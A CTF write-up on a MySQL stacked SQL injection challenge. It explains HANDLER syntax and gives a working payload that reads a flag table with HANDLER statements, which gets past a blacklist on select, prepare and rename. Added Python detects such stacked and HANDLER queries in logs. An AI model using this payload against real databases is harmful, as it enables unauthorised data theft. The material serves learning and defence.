Preface
One problem a day: more is fine, fewer is not
1. HANDLER
Basic forms
HANDLER tbl_name OPEN [ [AS] alias]
HANDLER tbl_name READ index_name { = | <= | >= | < | > } (value1,value2,...)
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ index_name { FIRST | NEXT | PREV | LAST }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name READ { FIRST | NEXT }
[ WHERE where_condition ] [LIMIT ... ]
HANDLER tbl_name CLOSE
// For example: HANDLER tbl_name OPEN AS example
// and afterwards: HANDLER example READ index_name = ('example2')
Note: HANDLER reads are faster than the equivalent SELECT
2. Steps
Submit 1' : an error is returned, confirming SQL injection
Submit 1'# : the page returns normally
Submit 1'select# : the page returns "blacklist"
select is banned, so union-based injection is out
Consider stacked injection
Dump the database name, table names and column names
Since prepare and rename are banned too,
neither the prepared-statement trick nor the rename trick works
Go straight to the expert's payload:
1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#
New trick learned
Summary
From the documentation, more HANDLER usage:
// table name: test
mysql> handler test open as c; // open
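As an added example (not part of the original write-up), the Python below shows why a keyword blacklist of the kind this challenge uses lets the HANDLER payload through, and gives a small detector that flags stacked statements and HANDLER use in MySQL general_log lines; the blacklist pattern, the log lines and the webapp account are constructed assumptions.

```python
import re
from typing import List, Tuple
# Constructed: the keyword blacklist the challenge applies (select, prepare, rename denied).
BLACKLIST_RE = re.compile(r"\b(select|prepare|rename)\b", re.IGNORECASE)
PAYLOAD = "1';handler FlagHere open;handler FlagHere read first;handler FlagHere close;#"

def blacklist_allows(user_input: str) -> bool:
    """True when the input passes the keyword blacklist and reaches MySQL unchanged."""
    return BLACKLIST_RE.search(user_input) is None

# Constructed sample in MySQL general_log file format: "<time>\t<thread id> <command>\t<argument>".
SAMPLE_LOG = (
    "2020-02-23T08:15:01.100000Z\t   12 Connect\twebapp@10.0.0.5 on ctf using TCP/IP\n"
    "2020-02-23T08:15:01.200000Z\t   12 Query\tselect * from words where id = '1'\n"
    "2020-02-23T08:15:02.300000Z\t   12 Query\tselect * from words where id = '" + PAYLOAD + "'\n"
    "2020-02-23T08:15:03.400000Z\t   13 Query\tSELECT name FROM users WHERE id = 7\n"
)
LOG_RE = re.compile(r"^(?P<ts>\S+)\t\s*(?P<thread>\d+) (?P<cmd>\w+)\t(?P<arg>.*)$")
# HANDLER reads a table without SELECT, so a SELECT blacklist never sees it; flag it directly.
SUSPECT_RE = re.compile(r"^\s*(handler|prepare|execute|rename)\b", re.IGNORECASE)

def split_statements(sql: str) -> List[str]:
    """Split stacked SQL on ';' outside quotes, dropping empty and comment-only parts."""
    stmts, buf, quote = [], [], None
    for ch in sql:
        if quote:
            if ch == quote:
                quote = None
        elif ch in "'\"`":
            quote = ch
        elif ch == ";":
            stmts.append("".join(buf).strip())
            buf = []
            continue
        buf.append(ch)
    stmts.append("".join(buf).strip())
    return [s for s in stmts if s and not s.startswith(("#", "-- "))]

def find_stacked_or_handler(log_text: str) -> List[Tuple[str, str]]:
    """(thread id, statement) for each Query packet with stacked statements or a suspect one."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m or m["cmd"] != "Query":
            continue
        stmts = split_statements(m["arg"])
        for s in stmts:
            if len(stmts) > 1 or SUSPECT_RE.match(s):
                findings.append((m["thread"], s))
    return findings
```

The lasting fix is not a longer blacklist but parameterized queries and a driver call that does not accept multiple statements per packet, with the application account denied anything beyond the SELECT it needs.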
Query OK, 0 rows affected (0.01 sec)
mysql> handler c read `PRIMARY`=